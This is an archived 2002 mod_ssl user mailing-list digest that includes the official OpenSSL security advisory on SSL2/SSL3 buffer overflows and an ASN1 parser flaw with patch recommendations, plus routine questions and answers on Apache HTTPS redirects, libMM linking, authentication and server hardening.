Note that for them to work properly you have to follow Verisign's
installation instructions, as browsers will not recognize
Verisign's signature if you forget to install the intermediate
certificate for the global server IDs.


Ciao

Thomas
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 16:28:46 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA12686; Tue, 30 Jul 2002 16:27:41 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from qeo02001.t-online.net id QAA12638; Tue, 30 Jul 2002 16:26:50 +0200 (MET DST)
Received: from qeo09161.de.t-online.corp (qeo09161 [192.168.248.161])
	by qeo02001.t-online.net (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id QAA11756
	for ; Tue, 30 Jul 2002 16:26:44 +0200
X-Authentication-Warning: qeo02001.t-online.net: Host qeo09161 [192.168.248.161] claimed to be qeo09161.de.t-online.corp
Received: from qeo00200.de.t-online.corp ([192.168.195.200]) by qeo09161.de.t-online.corp with Microsoft SMTPSVC(5.0.2195.4617);
	 Tue, 30 Jul 2002 16:23:05 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: OpenSSL Security Advisory [30 July 2002]
Date: Tue, 30 Jul 2002 16:23:04 +0200
Message-ID: <60F1F87A64834D45A1EBAE9618305FB80120BE87@qeo00200>
Thread-Topic: switching http requests to https
Thread-Index: AcI2biO3WLQscU30QBeigAd3SXMsewBZrhGw
From: "Courtin Bert" 
To: 
X-OriginalArrivalTime: 30 Jul 2002 14:23:05.0021 (UTC) FILETIME=[9E6B1ED0:01C237D4]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA12666
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Courtin Bert" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

FYI - don't sue me for posting this here - I know, everyone who needs this info *should* have it already, but maybe not ;-)

Kind regards,
B. Courtin

--

OpenSSL Security Advisory [30 July 2002]

This advisory consists of two independent advisories, merged, and is
an official OpenSSL advisory.

Advisory 1
==========

A.L. Digital Ltd and The Bunker (http://www.thebunker.net/) are
conducting a security review of OpenSSL, under the DARPA program
CHATS.

Vulnerabilities
---------------

All four of these are potentially remotely exploitable.

1. The client master key in SSL2 could be oversized and overrun a
    buffer. This vulnerability was also independently discovered by
    consultants at Neohapsis (http://www.neohapsis.com/) who have also
    demonstrated that the vulerability is exploitable. Exploit code is
    NOT available at this time.

2. The session ID supplied to a client in SSL3 could be oversized and
    overrun a buffer.

3. The master key supplied to an SSL3 server could be oversized and
    overrun a stack-based buffer. This issues only affects OpenSSL
    0.9.7 before 0.9.7-beta3 with Kerberos enabled.

4. Various buffers for ASCII representations of integers were too
    small on 64 bit platforms.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2002-0656 to issues 1-2, CAN-2002-0657 to issue
3, and CAN-2002-0655 to issue 4.

In addition various potential buffer overflows not known to be
exploitable have had assertions added to defend against them.

Who is affected?
----------------

Everyone using OpenSSL 0.9.6d or earlier, or 0.9.7-beta2 or earlier or
current development snapshots of 0.9.7 to provide SSL or TLS is
vulnerable, whether client or server. 0.9.6d servers on 32-bit systems
with SSL 2.0 disabled are not vulnerable.

SSLeay is probably also affected.

Recommendations
---------------

Apply the attached patch to OpenSSL 0.9.6d, or upgrade to OpenSSL
0.9.6e. Recompile all applications using OpenSSL to provide SSL or
TLS.

A patch for 0.9.7 is available from the OpenSSL website
(http://www.openssl.org/).

Servers can disable SSL2, alternatively disable all applications using
SSL or TLS until the patches are applied. Users of 0.9.7 pre-release
versions with Kerberos enabled will also have to disable Kerberos.

Client should be disabled altogether until the patches are applied.

Known Exploits
--------------

There are no know exploits available for these vulnerabilities. As
noted above, Neohapsis have demonstrated internally that an exploit is
possible, but have not released the exploit code.

References
----------

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0655
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0656
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0657

Acknowledgements
----------------

The project leading to this advisory is sponsored by the Defense
Advanced Research Projects Agency (DARPA) and Air Force Research
Laboratory, Air Force Materiel Command, USAF, under agreement number
F30602-01-2-0537.

The patch and advisory were prepared by Ben Laurie.



Advisory 2
==========

Vulnerabilities
---------------

The ASN1 parser can be confused by supplying it with certain invalid
encodings.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2002-0659 to this issue.

Who is affected?
----------------

Any OpenSSL program which uses the ASN1 library to parse untrusted
data. This includes all SSL or TLS applications, those using S/MIME
(PKCS#7) or certificate generation routines.

Recommendations
---------------

Apply the patch to OpenSSL, or upgrade to OpenSSL 0.9.6e. Recompile
all applications using OpenSSL.

Users of 0.9.7 pre-release versions should apply the patch or upgrade
to 0.9.7-beta3 or later. Recompile all applications using OpenSSL.

Exploits
--------

There are no known exploits for this vulnerability.

References
----------

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0659

Acknowledgements
----------------

This vulnerability was discovered by Adi Stav 
and James Yonan  independently. The patch is partly
based on a version by Adi Stav.

The patch and advisory were prepared by Dr. Stephen Henson.




Combined patches for OpenSSL 0.9.6d:
http://www.openssl.org/news/patch_20020730_0_9_6d.txt

Combined patches for OpenSSL 0.9.7 beta 2:
http://www.openssl.org/news/patch_20020730_0_9_7.txt

URL for this Security Advisory:
http://www.openssl.org/news/secadv_20020730.txt
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 18:07:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA20734; Tue, 30 Jul 2002 18:06:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from smtp25.baruch.cuny.edu id SAA20624; Tue, 30 Jul 2002 18:04:18 +0200 (MET DST)
Received: (qmail 1103 invoked by uid 0); 30 Jul 2002 16:03:15 -0000
Received: from unknown (HELO 8wpkx01.mindspring.com) (150.210.151.45)
  by smtp25.baruch.cuny.edu with SMTP; 30 Jul 2002 16:03:15 -0000
Message-Id: <5.0.2.1.0.20020730115720.00a558f0@pop.mindspring.com>
X-Sender: choepete@pop.mindspring.com
X-Mailer: QUALCOMM Windows Eudora Version 5.0.2
Date: Tue, 30 Jul 2002 12:03:43 -0400
To: modssl-users@modssl.org
From: Peter Choe 
Subject: using rewrite with mod_ssl
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter Choe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

i have successfully limited access to a dirctory using mod_ssl.  meaning 
that the files in that directory will only show when it uses ssl 
protocol.  but when it doesn't uses ssl protocol but just, 
http://hostname/manual, it gives me a page can't be displayed message.

i thought that with the rewrite, it would automatically send it to the ssl 
protocol (https://hostname/manual).  i am wrong to think this?

this is the rewrite statement i have in my httpd.conf

RewriteCond %{SERVER_PORT}      !^443$
RewriteRule ^/manual/(.*)               https://%{SERVER_NAME}/$1 [L,R]

how can i set up my server so that when someone goes to 
http://hostname/manual, they will automatically get redirected?


Peter Choe

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 18:51:41 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA25191; Tue, 30 Jul 2002 18:49:58 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0017.ix.itaction.net id SAA25012; Tue, 30 Jul 2002 18:48:43 +0200 (MET DST)
Received: from localhost ([127.0.0.1] helo=itaction.co.uk)
	by it0017.ix.itaction.net with esmtp (Exim 4.05)
	id 17ZaAX-0000C7-00
	for modssl-users@modssl.org; Tue, 30 Jul 2002 16:48:21 +0000
Message-ID: <3D46C351.2060104@itaction.co.uk>
Date: Tue, 30 Jul 2002 17:48:17 +0100
From: Peter Viertel 
Organization: IT Action Ltd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.1a) Gecko/20020611
X-Accept-Language: en-gb, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: using rewrite with mod_ssl
References: <5.0.2.1.0.20020730115720.00a558f0@pop.mindspring.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter Viertel 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

If you cut and pasted that straight from your config then you have a 
typo in the rule....

Instead of:

RewriteCond %{SERVER_PORT}      !^443$
RewriteRule ^/manual/(.*)               https://%{SERVER_NAME}/$1 [L,R]

try

RewriteCond %{SERVER_PORT}      !^443$
RewriteRule ^/(manual/.*)               https://%{SERVER_NAME}/$1 [L,R]



Peter Choe wrote:

> i have successfully limited access to a dirctory using mod_ssl.  
> meaning that the files in that directory will only show when it uses 
> ssl protocol.  but when it doesn't uses ssl protocol but just, 
> http://hostname/manual, it gives me a page can't be displayed message.
>
> i thought that with the rewrite, it would automatically send it to the 
> ssl protocol (https://hostname/manual).  i am wrong to think this?
>
> this is the rewrite statement i have in my httpd.conf
>
> RewriteCond %{SERVER_PORT}      !^443$
> RewriteRule ^/manual/(.*)               https://%{SERVER_NAME}/$1 [L,R]
>
> how can i set up my server so that when someone goes to 
> http://hostname/manual, they will automatically get redirected?
>
>
> Peter Choe
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 20:58:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA05488; Tue, 30 Jul 2002 20:57:58 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.casadepauw.nl id UAA05409; Tue, 30 Jul 2002 20:56:30 +0200 (MET DST)
Received: from frank.bos.nl (213-84-182-193.adsl.xs4all.nl [213.84.182.193])
	by mail.casadepauw.nl (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id UAA02927
	for ; Tue, 30 Jul 2002 20:56:37 +0200
X-Authentication-Warning: mail.casadepauw.nl: Host 213-84-182-193.adsl.xs4all.nl [213.84.182.193] claimed to be frank.bos.nl
Message-Id: <5.1.0.14.2.20020730205731.00b04a70@195.81.39.252>
X-Sender: fnijenlist@mail.bos.nl
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Tue, 30 Jul 2002 20:57:50 -0700
To: modssl-users@modssl.org
From: fnijenlist 
Subject: relation between apache-modssl-libMM
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: fnijenlist 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi ppl,
Due to some security issues with openssl and the issue with libMM giving 
away a root account on systems where you can get a shell as the user apache 
is running as i'm forced to do some minor upgrades :)
I'm trying to figure out the relationship with libMM, ldd  on the libssl.so 
module and on the httpd binary returns that openssl is dynamically linked, 
great...but what about libMM?
Since it doesn't show up it's static linked, but are the functions linked 
in the ssl module or do i have to replace the whole httpd binary?
Anyway any idea, i get the idea that the libMM is used in the general EAPI 
interface, concluding that mm functions are used in the httpd binary..and 
all other modules?
If anyone can shed some light on this?

Frank

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 21:04:36 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA05937; Tue, 30 Jul 2002 21:03:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhub.AXP.MDX.AC.UK id VAA05827; Tue, 30 Jul 2002 21:01:15 +0200 (MET DST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.1-1 #38636)
 id <01KKPV193WXC001BDA@mdx.ac.uk> for modssl-users@modssl.org; Tue,
 30 Jul 2002 20:00:20 +0100 (BST)
Received: from mdx-cpq-temp1.nw.mdx.ac.uk ([158.94.52.12])
 by mdx.ac.uk (PMDF V6.1-1 #38636) with ESMTP id <01KKPV12YZ3I001OEQ@mdx.ac.uk>
 for modssl-users@modssl.org; Tue, 30 Jul 2002 20:00:13 +0100 (BST)
Received: from MDX-CPQ-TEMP1/SpoolDir by mdx-cpq-temp1.nw.mdx.ac.uk
 (Mercury 1.48); Tue, 30 Jul 2002 19:56:01 +0000
Received: from SpoolDir by MDX-CPQ-TEMP1 (Mercury 1.48); Tue,
 30 Jul 2002 19:55:32 +0000
Date: Tue, 30 Jul 2002 19:55:32 +0000
From: a.moon@mdx.ac.uk
Subject: relation between apache-modssl-libMM
To: modssl-users@modssl.org
Message-id: <141289C278E@mdx-cpq-temp1.nw.mdx.ac.uk>
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I am away from the office until the Monday 5th August 2002 

I will get back to you as soon as i can on my return.

If it's an urgent Online Learning Support Unit / Web/ MUBSWEB/ MUBS Online matter
that requires urgent attention then  please contact either  Sanjay1 or Jeff1
who should be able to help.

All the best 
Alex
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 21:41:53 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA11354; Tue, 30 Jul 2002 21:41:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.navitaire.com id VAA11319; Tue, 30 Jul 2002 21:40:17 +0200 (MET DST)
Received: from exchange.Navitaire.com (exch.navitaire.com [149.122.4.14])
	by mail.navitaire.com (Switch-2.1.4/Switch-2.1.0) with ESMTP id g6UJe6p11562
	for ; Tue, 30 Jul 2002 14:40:07 -0500 (CDT)
Received: by exchange.Navitaire.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 30 Jul 2002 14:37:15 -0500
Message-ID: 
From: "Henning, Brian" 
To: "'modssl-users@modssl.org'" 
Subject: mod_ssl newbie
Date: Tue, 30 Jul 2002 14:37:14 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Henning, Brian" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,
I am new to the ssl world. Right now I am running w2k with apache 1.3.23 web
server. I downloaded the mod_ssl package from the website. I changed the
port on my apache web server to 443. On a high level what do i need to do to
create a secure web server? I guess my real problem is i don't know what ssl
does for me. What i am looking for is something that can password protect
the files on my server. I want to let specific people to access my site and
that is it. They must have a password to use it. Is mod_ssl what i want or
should i be looking else where?
thanks for any input,
brian
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 21:54:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA12523; Tue, 30 Jul 2002 21:53:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id VAA12160; Tue, 30 Jul 2002 21:50:05 +0200 (MET DST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 560DE2537A; Tue, 30 Jul 2002 12:40:30 -0700 (PDT)
Date: Tue, 30 Jul 2002 12:40:30 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: mod_ssl newbie
Message-ID: <20020730194030.GB4988@rawbyte.com>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


For that you do not want SSL. Checkout:
http://httpd.apache.org/docs-2.0/howto/auth.html

For an introduction to SSL and Apache, you can check
out a chapter I have online :
http://apacheworld.org/ty24/site.chapter17.html

Cheers

Daniel

On Tue, Jul 30, 2002 at 02:37:14PM -0500, Henning, Brian wrote:
> Hello,
> I am new to the ssl world. Right now I am running w2k with apache 1.3.23 web
> server. I downloaded the mod_ssl package from the website. I changed the
> port on my apache web server to 443. On a high level what do i need to do to
> create a secure web server? I guess my real problem is i don't know what ssl
> does for me. What i am looking for is something that can password protect
> the files on my server. I want to let specific people to access my site and
> that is it. They must have a password to use it. Is mod_ssl what i want or
> should i be looking else where?
> thanks for any input,
> brian
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 21:54:58 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA12577; Tue, 30 Jul 2002 21:53:56 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from smtp25.baruch.cuny.edu id VAA12191; Tue, 30 Jul 2002 21:50:25 +0200 (MET DST)
Received: (qmail 1714 invoked by uid 0); 30 Jul 2002 19:49:20 -0000
Received: from unknown (HELO 8wpkx01.mindspring.com) (150.210.151.45)
  by smtp25.baruch.cuny.edu with SMTP; 30 Jul 2002 19:49:20 -0000
Message-Id: <5.0.2.1.0.20020730154815.00a48ec0@pop.mindspring.com>
X-Sender: choepete@pop.mindspring.com
X-Mailer: QUALCOMM Windows Eudora Version 5.0.2
Date: Tue, 30 Jul 2002 15:49:35 -0400
To: modssl-users@modssl.org
From: Peter Choe 
Subject: Re: mod_ssl newbie
In-Reply-To: 
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter Choe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

you probably want to look at .htaccess which would prompt people for userid 
and password to access certain parts of your webserver.

ssl provides encryption so that data being sent back and forth between your 
server and the client can't be easily read.

At 03:37 PM 7/30/2002, you wrote:
>Hello,
>I am new to the ssl world. Right now I am running w2k with apache 1.3.23 web
>server. I downloaded the mod_ssl package from the website. I changed the
>port on my apache web server to 443. On a high level what do i need to do to
>create a secure web server? I guess my real problem is i don't know what ssl
>does for me. What i am looking for is something that can password protect
>the files on my server. I want to let specific people to access my site and
>that is it. They must have a password to use it. Is mod_ssl what i want or
>should i be looking else where?
>thanks for any input,
>brian
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

Peter Choe

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 22:54:53 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA19159; Tue, 30 Jul 2002 22:54:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id WAA19068; Tue, 30 Jul 2002 22:52:42 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id QAA13113;
	Tue, 30 Jul 2002 16:30:52 -0400
Date: Tue, 30 Jul 2002 16:30:52 -0400 (EDT)
From: "R. DuFresne" 
To: "Henning, Brian" 
cc: "'modssl-users@modssl.org'" 
Subject: Re: mod_ssl newbie
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Many people seem to have the impression that security=ssl enabled, and in
some ways it does enhance security, but, it's certainly by no means the
end of the game, nor the beginning.  security begins with the OS install.
Not adding packages known to be exploitable , closing out un-needed services not using NFS, then trun it
off, disable it via the kernel rebuild process, etc, replacing telnet, ftp
and the R* commands with ssh/scp, setting proper permissions throughout
the directory structure to limit local exposures and abilities.  Of course
the game gets tougher once you allow others onto the system, once a person
has a shell on the box, they have many more routes to compromise the
system, so, trust begins to play a larger and larger role.  so, to more
directly answer your question, no mod-ssl is not going to fit your needs
completely here.  It begins at the administration level.  Think of ssl
enabled transactions as more of a secure tunnel for the protection of the
exchange of information  in an encryted tunnel over the pulic network.  For those with
actual login capqabilites on your system, you have a whole other set of
worms to fish up and out.  Even a ssl "secured" web server with open
exploitable service runnning on other tcp/ip or udp ports will leave you
0w3d in short order.  The system you are  attempting to secure should not
even touch the internet until *after* it has been properly configured and
secured.

Here's a reading list to get you started:

http://rr.sans.org/
http://www.interhack.net/pubs/fwfaq/
http://geodsoft.com/howto/harden/
http://www.nfr.com/forum/publications.html
http://www.ticm.com/info/insider/members/fwsecfaq/index.html
http://www.avolio.com/columns/15.html
http://www.wilyhacker.com/
http://www.jmu.edu/computing/runsafe/
http://csrc.nist.gov/itsec/guidance_W2Kpro.html
http://www.networkcomputing.com/1120/1120ws1.html
http://www.Linux-Sec.net/Policy/

http://www.pc-help.org/obscure.htm
http://www.monkeys.com/security/proxies/
http://nms-cgi.sourceforge.net/
http://www.cgisecurity.com/articles/
http://www.apacheweek.com/features/security-13
http://www.cgisecurity.net/papers/


Thanks,

Ron DuFresne

On Tue, 30 Jul 2002, Henning, Brian wrote:

> Hello,
> I am new to the ssl world. Right now I am running w2k with apache 1.3.23 web
> server. I downloaded the mod_ssl package from the website. I changed the
> port on my apache web server to 443. On a high level what do i need to do to
> create a secure web server? I guess my real problem is i don't know what ssl
> does for me. What i am looking for is something that can password protect
> the files on my server. I want to let specific people to access my site and
> that is it. They must have a password to use it. Is mod_ssl what i want or
> should i be looking else where?
> thanks for any input,
> brian
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 30 23:28:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA20951; Tue, 30 Jul 2002 23:25:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from smtp25.baruch.cuny.edu id XAA20828; Tue, 30 Jul 2002 23:23:01 +0200 (MET DST)
Received: (qmail 26252 invoked by uid 0); 30 Jul 2002 21:20:46 -0000
Received: from unknown (HELO 8wpkx01.mindspring.com) (150.210.151.45)
  by smtp25.baruch.cuny.edu with SMTP; 30 Jul 2002 21:20:46 -0000
Message-Id: <5.0.2.1.0.20020730171843.00a4fd90@pop.mindspring.com>
X-Sender: choepete@pop.mindspring.com
X-Mailer: QUALCOMM Windows Eudora Version 5.0.2
Date: Tue, 30 Jul 2002 17:20:55 -0400
To: modssl-users@modssl.org
From: Peter Choe 
Subject: mod_ssl and mod_jk
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Peter Choe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

i am trying to get mod_jk to work with mod_ssl.  i am able to compile 
mod_jk.  but when i try to start apache and i have mod_jk and mod_ssl 
enable, i get a message saying that apache cannot start.

if i have one or the other, apache can start.  is this a known 
problem?  how i can fix this?

Peter Choe

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 06:13:39 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA17925; Wed, 31 Jul 2002 06:12:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.nelsonprinting.com id GAA17727; Wed, 31 Jul 2002 06:11:23 +0200 (MET DST)
Received: from AGAMEMNON.nelsonprinting.com (adsl-208-189-14-173.dsl.ltrkar.swbell.net [208.189.14.173])
	by mail.nelsonprinting.com (8.9.3/8.9.3) with ESMTP id RAA22953
	for ; Tue, 30 Jul 2002 17:34:57 -0500
Message-Id: <5.1.0.14.2.20020730230629.0f2dbec0@mail.nccinternet.com>
X-Sender: matt@mail.nelsonprinting.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Tue, 30 Jul 2002 23:13:15 -0500
To: modssl-users@modssl.org
From: Matt Nelson 
Subject: Error message help
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Nelson 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all, I'm new to the list and to mod_ssl, and well ssl in general, so I 
hope you'll forgive what may be dumb questions.

I've been tasked with setting up a ssl site for a small company that wants 
to sell online.  I've never done anything other than plain sites before, so 
I'm having to learn.   I've done what all the docs have told me to, as near 
as I can tell, and I've gotten pretty far along.  I'm still fuzzy on the 
exact syntax of the directives, but I've gotten it nearly working I 
think.  This is all being done on a stock Caldera 3.11 server box.

Now, the error I'm getting now  that I can't seem to find any help on, in 
the error_log is:


OpenSSL: error:0D06B078:asn1 encoding routines:ASN1_get_object:header too long


I've googled on it, and searched FAQ's, etc, and nothing of help has appeared.


I'd appreciate some help on this, I hate when I can't find help in the 
docs, I hate having to bother anyone.


Thanks

--
Matt

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 08:26:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA27365; Wed, 31 Jul 2002 08:26:00 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA27284; Wed, 31 Jul 2002 08:24:59 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 1C8324CE76C; Wed, 31 Jul 2002 08:24:59 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 35AD82873E; Wed, 31 Jul 2002 07:58:25 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id UAA05428; Tue, 30 Jul 2002 20:56:49 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 30 Jul 2002 11:55:43 -0700
X-Originating-IP: [65.32.137.25]
From: "Mike Boyer" 
To: 
Subject: ssl question
Date: Tue, 30 Jul 2002 14:57:28 -0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_008A_01C237D9.6C66C2E0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-ID: 
